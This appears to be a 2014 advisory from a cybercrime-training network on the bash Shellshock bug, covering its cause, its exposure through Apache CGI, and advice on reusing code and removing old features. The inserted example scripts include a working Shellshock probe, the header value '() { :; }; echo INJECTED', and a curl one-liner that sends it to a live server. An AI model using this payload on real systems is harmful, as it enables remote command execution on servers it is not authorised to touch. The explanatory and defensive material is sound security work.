Cybercrime Centres of Excellence Network for Training, Research and Education

The BASH Shellshock Bug: Unintended Consequences in Reuse of Software

1 Introduction

On September 24th, advisories were published concerning a bug in the Bourne Again SHell, bash [1]. This software is a command line interpreter for UNIX-like systems and exists on many platforms, including end-user systems [2]. To make matters worse, bash is invoked by popular network-facing software such as the apache web server (to run CGI scripts) or OpenSSH (to run forced commands), so input that arrives over the network can end up being interpreted by bash. To put things in perspective, the apache web server hosts about half of the web sites on the internet today [3]. Under certain conditions, attackers can force these legitimate services to execute arbitrary commands on the server. This started to happen very soon after publication of the vulnerability [4], and the bug is now used as a vector to spread malware [5]. At the time of writing, systems administrators and web site operators are rushing to patch their systems.

2 The Problem

(This section makes use of technical language.)

Bash was created 25 years ago to provide a versatile environment with which to administer UNIX systems. It provides scripting facilities that allow, among other things, the automation of common tasks. Parameters to scripts are often passed as environment variables. The content of these variables can be anything: the name of a file, a username, or even function definitions. When bash starts, it scans its environment for variables whose value begins with "() {" and imports them as function definitions. In this particular case, the vulnerability lies in the fact that bash continued to process the text after the end of the function definition as commands, and executed them immediately at start-up, before the script itself ran. Whoever controls the content of such an environment variable therefore controls what the shell executes. More technical information about the problem is available online [6] and [7].

3 Why is This Bad?

3.1 Widespread Usage

The apache web server can use bash to produce dynamic web pages: through the Common Gateway Interface (CGI) [8], it runs a script for each request and passes the request's headers and parameters to that script as environment variables. If the script is itself a bash script, or invokes a shell to do part of its work, the attacker-supplied header values reach bash. Other software, for example mail servers, also use bash for back-end operations.
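The attack path described above, reproduced locally as an added example (this script is not part of the advisory). It imitates what mod_cgi does for one request: the CGI script is started with the request headers exported as HTTP_* environment variables, here a User-Agent header whose value is an empty bash function definition followed by a trailing command. The CGI script, its location and the payload are constructed for the example. On a bash that predates the September 2014 fixes the trailing command runs before the script's first line; on a fixed bash it does not.

```shell
#!/bin/sh
# Added example: reproduce the CGI attack path against the local bash.
# mod_cgi exports request headers to the CGI process as HTTP_<HEADER>
# environment variables. A bash started with such an environment imports
# every value that begins with "() {" as a function; the buggy versions
# also executed whatever text followed the closing brace.

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT

# A minimal CGI script written in bash (constructed for the example).
cat > "$WORKDIR/status.cgi" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "server time: $(date -u)"
EOF

# simulate_request UA_VALUE: run the script with the environment mod_cgi
# would build for "GET /cgi-bin/status.cgi" carrying "User-Agent: UA_VALUE".
# Only PATH is kept from the caller's environment, as the server would do.
simulate_request() {
    env -i PATH="$PATH" \
        REQUEST_METHOD=GET \
        SCRIPT_NAME=/cgi-bin/status.cgi \
        HTTP_USER_AGENT="$1" \
        bash "$WORKDIR/status.cgi" 2>/dev/null
}

# The header value an attacker would send: an empty function definition,
# then the command that a vulnerable bash runs at start-up.
PAYLOAD='() { :; }; echo INJECTED'

# host_is_vulnerable: prints "vulnerable" if the trailer was executed,
# "not_vulnerable" otherwise, and "bash_not_found" if there is no bash to test.
host_is_vulnerable() {
    command -v bash >/dev/null 2>&1 || { echo bash_not_found; return 0; }
    case "$(simulate_request "$PAYLOAD")" in
        *INJECTED*) echo vulnerable ;;
        *)          echo not_vulnerable ;;
    esac
}

host_is_vulnerable
```

The same check works against a real server by sending the payload in any header (for example with `curl -A '() { :; }; echo INJECTED' http://host/cgi-bin/status.cgi`); nothing in the server itself needs to be misconfigured, the script only has to be reachable and to involve bash.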
The apache web server runs on about 50% of the web servers on the internet, but that is not the full story. Derivatives of apache and bash exist on countless devices as the back-end for the administration interface: home routers, media players, Small-Office/Home Office network storage appliances, etc. There are millions of these devices in the field, often operated by people with little to no expertise in systems administration, who have no idea that their device is offering this kind of service and is vulnerable, and even less idea of how to fix the problem.

3.2 Inappropriate Reuse

Bash was never intended to be reachable online. The intent was rather that it be used locally, or over trusted links, by knowledgeable people to perform for example systems administration tasks. However, as already stated, the apache web server uses it to provide CGI pages (see Glossary), and this is only the most common case: mail servers and countless other programs pass data to bash and might therefore be used as components of attack vectors. The result of this bundling is that a tool, and in particular extended functionality that was meant to be used by trusted persons in trusted environments, is reachable by anyone with an internet connection. The bug, which has little impact in the intended environment, can now have devastating effects. Most likely, the choice of bash as a mechanism to provide dynamic web pages was one of convenience rather than a carefully studied selection. Bash was already ubiquitous on systems where the web server could run, and the authors used it without caring about its unnecessary features.

3.3 Obsolete Features

The idea of allowing a web server to execute CGI scripts dates back to 1993 [9]. In the early days of the internet, CGI was the only way for a web site to provide dynamic pages. Since then, alternatives to CGI such as servlets or ASP have appeared.
These are more efficient and better integrated in the web server, and make for a more comfortable development environment. Nevertheless, the feature remains, and there are many reasons for this: fear of breaking popular sites; difficulty of removing old code; failure to review the feature list, etc.

4 Recommendations

4.1 Think Before Reusing

Reusing existing code and programs is a common development practice. Programmers are encouraged not to re-invent the wheel. However, they often reuse software without completely understanding the ramifications of the reuse, and without regard for unnecessary features in the reused software. Developers are under pressure to deliver faster, and have neither the time, the expertise, nor the incentive to conduct a proper review of reused code. This was also one of the underlying problems in the recent "Heartbleed" incident [8]. We recommend that any code reuse be the result of a thorough review and understanding of the reused code. Management must allow and encourage developers to take the time to perform this review, and developers must not focus only on speed and convenience. Unnecessary features should be stripped. Should that prove impossible or take too much time, then the code should not be reused, or any resulting risk must be consciously accepted.

4.2 Review Features

As described in section 3.3, CGI dates back to 1993 [9] and has long had more efficient and better integrated alternatives such as servlets or ASP, yet the feature is still present in deployed web servers: nobody wants to break popular sites, old code is hard to remove, and feature lists are rarely reviewed. We recommend that providers of online services or infrastructure regularly review the need to keep existing features in deployed software, and plan for their removal when better alternatives exist.
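The review recommended above needs an inventory first. The following is an added example, not from the advisory, of how an operator could list where an Apache installation has CGI execution switched on and which CGI scripts hand request data to a shell. The configuration and cgi-bin directory are constructed for the example and stand in for /etc/apache2 and /usr/lib/cgi-bin; the directive names (ScriptAlias, AddHandler cgi-script, Options ExecCGI) are the real Apache ones, the sample content is made up.

```shell
#!/bin/sh
# Added example: inventory CGI exposure on an Apache host before deciding
# whether the feature can be removed. Two questions are answered:
#  1. where does the configuration allow CGI execution at all?
#  2. which CGI scripts will run bash (directly, or via /bin/sh where that is bash)?

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
mkdir -p "$WORKDIR/conf" "$WORKDIR/cgi-bin"

# Constructed sample configuration: one CGI-enabled location, one where it is off.
cat > "$WORKDIR/conf/sites.conf" <<'EOF'
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
    Options +ExecCGI
    AddHandler cgi-script .cgi .sh
</Directory>
<Directory "/var/www/html">
    Options -ExecCGI
</Directory>
EOF

# Constructed sample scripts: a bash CGI, a Perl CGI that shells out through
# backticks, and a Python CGI that never spawns a shell.
cat > "$WORKDIR/cgi-bin/status.sh" <<'EOF'
#!/bin/bash
echo "Content-Type: text/plain"; echo; uptime
EOF
cat > "$WORKDIR/cgi-bin/lookup.pl" <<'EOF'
#!/usr/bin/perl
print "Content-Type: text/plain\n\n";
print `host $ENV{QUERY_STRING}`;
EOF
cat > "$WORKDIR/cgi-bin/hello.py" <<'EOF'
#!/usr/bin/python3
print("Content-Type: text/plain\n\nhello")
EOF

# cgi_enabled_directives CONFDIR: directives that switch CGI execution on.
# Apache directive names are case-insensitive, hence -i; "Options -ExecCGI"
# turns the feature off and is filtered out.
cgi_enabled_directives() {
    grep -rhiE '^[[:space:]]*(ScriptAlias(Match)?[[:space:]]|AddHandler[[:space:]]+cgi-script|Options[[:space:]].*ExecCGI)' "$1" \
        | grep -viE 'Options[[:space:]].*-ExecCGI' \
        | sed 's/^[[:space:]]*//'
}

# shell_backed_cgis CGIDIR: scripts whose execution reaches a shell, either
# because they are shell scripts (shebang) or because they shell out from
# another language (system(), popen(), backticks, os.system, shell=True).
shell_backed_cgis() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if head -n1 "$f" | grep -qE '^#![[:space:]]*/(usr/)?bin/(ba)?sh'; then
            echo "$(basename "$f"): shell script"
        elif grep -qE 'system\(|popen\(|`[^`]+`|os\.system|shell=True' "$f"; then
            echo "$(basename "$f"): spawns a shell"
        fi
    done
}

echo "CGI enabled by:";             cgi_enabled_directives "$WORKDIR/conf"
echo "Scripts that reach a shell:"; shell_backed_cgis "$WORKDIR/cgi-bin"
```

Two caveats when running this against a real installation. The configuration scan only sees the directory it is pointed at, so Include'd files elsewhere and .htaccess files (where AllowOverride permits Options) must be added to the inventory by hand. The second list is an upper bound: Perl backticks, system() and Python's os.system go through /bin/sh, which is bash on Red Hat-family systems but dash on Debian and Ubuntu, so a script in that list may or may not reach bash on a given host. If nothing in the inventory is needed, the feature is removed rather than patched around: on Debian-derived systems `a2dismod cgi` (or `a2dismod cgid` with a threaded MPM) followed by `apachectl configtest` and a restart; elsewhere, comment out the LoadModule line for mod_cgi and drop the ScriptAlias and ExecCGI directives the scan reported.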
Product teams should not be afraid to deprecate old features, even more so when they prove to be dangerous.

Glossary

ASP (Active Server Pages): Technology created by Microsoft to facilitate the development of web applications on their web server software.
CGI (Common Gateway Interface): The first mechanism that allowed a web server to return dynamic pages.
Command-Line Interpreter: A program that acts as a text user interface for an operating system.
Environment Variable: A named value that can be used in a script. Usage of the variable in a script will be replaced by its value. Environment variables are inherited by child processes, which is how a web server hands request data to a CGI script.
Servlet: Mechanism to extend the functionality of a web server in Java.
Script: A (usually) small set of commands that automate tasks on a computer.
UNIX: Operating system originally developed in the 70's. Linux is one of the most popular UNIX-like systems.
Posted on: Sun, 05 Oct 2014 00:39:10 +0000
